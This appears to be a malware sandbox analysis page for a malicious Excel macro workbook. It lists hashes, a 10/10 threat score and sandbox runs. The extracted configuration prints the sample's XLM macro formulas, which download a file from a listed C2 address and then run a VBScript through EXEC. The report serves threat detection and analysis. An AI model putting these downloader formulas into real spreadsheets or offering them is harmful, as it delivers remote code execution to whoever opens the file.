8c3f1a8e66ba145496d0eb11c5d51ca5 | Triage

Submit
Reports

Overview

overview

Static

static

8c3f1a8e66...5.xlsm

windows7-x64

8c3f1a8e66...5.xlsm

windows10-2004-x64

6

Sharing

Copy URL Twitter E-mail

Static task

static1

Behavioral task

behavioral1

Sample

8c3f1a8e66ba145496d0eb11c5d51ca5.xlsm

Resource

win7-20231215-en

windows7-x64

2 signatures

150 seconds

Behavioral task

behavioral2

Sample

8c3f1a8e66ba145496d0eb11c5d51ca5.xlsm

Resource

win10v2004-20231215-en

windows10-2004-x64

2 signatures

150 seconds

General

Target

8c3f1a8e66ba145496d0eb11c5d51ca5
Size

6KB
MD5

8c3f1a8e66ba145496d0eb11c5d51ca5
SHA1

aaf3af820bca7a136a2a895080edc85401a86b7a
SHA256

ae1a73384724381e0f0c58a7761bba4cac031b3aea9247ec26695955fb6db7ef
SHA512

fd492d3d59f7adfbcbf6438e32652b517ecf4b1cb0f4071df0c3abecc501388b92b8fa2f6598403b1a8607b77239256bc8ab91820cfbbf59d17e2ead1783e52c
SSDEEP

192:NDSluSEbrA2OmmfRD8UhHFBFYulb98yM2+x:NGuNM2wh1FY8b98yMN

Score

10^/10

xlm

Malware Config

Extracted

Rule

Excel 4.0 XLM Macro

C2

http://46.17.98.187/index.php

http://google.com/index.php

Attributes

formulas
=CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()

Signatures

Files

8c3f1a8e66ba145496d0eb11c5d51ca5
.xlsm office2007

© 2018-2025

Terms | Privacy